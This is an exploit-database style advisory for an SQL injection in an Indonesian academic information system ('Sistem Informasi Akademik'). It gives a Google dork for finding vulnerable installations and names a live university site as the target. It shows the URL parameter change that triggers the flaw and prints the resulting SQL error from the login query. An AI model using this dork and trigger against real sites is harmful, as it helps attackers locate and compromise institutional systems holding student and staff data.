Sistem Informasi Akademik SQL Injection

2019.01.31

L4663r666h05t (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:?mnux=login

# Exploit Title: Sistem Informasi Akademik SQL Injection
# Dork: inurl:?mnux=login
# Date: 2019-01-31
# Type: Low
# Exploit Author: L4663r666h05t - RebellionGhost
# Vendor Homepage: N/A
# Tested on: Windows 10 x64

Dorking on google : inurl:mnux?=login or you can open this page: 
Live Target:
http://sisfo193.unisma.ac.id/?mnux=login

Change "?mnux=login" into "?mnux=loginprc&BypassMenu=1"

Output:

Gagal:
select * from  
      where Login=''
      and LevelID = '' 
      and KodeID = 'UNISMA' 
      and NA = 'N'
      and Password=LEFT(PASSWORD(''),10) limit 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA' at line 2

Screenshot: http://prntscr.com/meje0q

Thanks to: ManadoGhost - RebellionGhost - ExploiterID - Berandal - Mr.Vendetta_404 - KID2ZON3 - Vlyn - Indonesia Cyber Freedom - All Indonesian Haxor

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sistem Informasi Akademik SQL Injection

Dork: inurl:?mnux=login

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.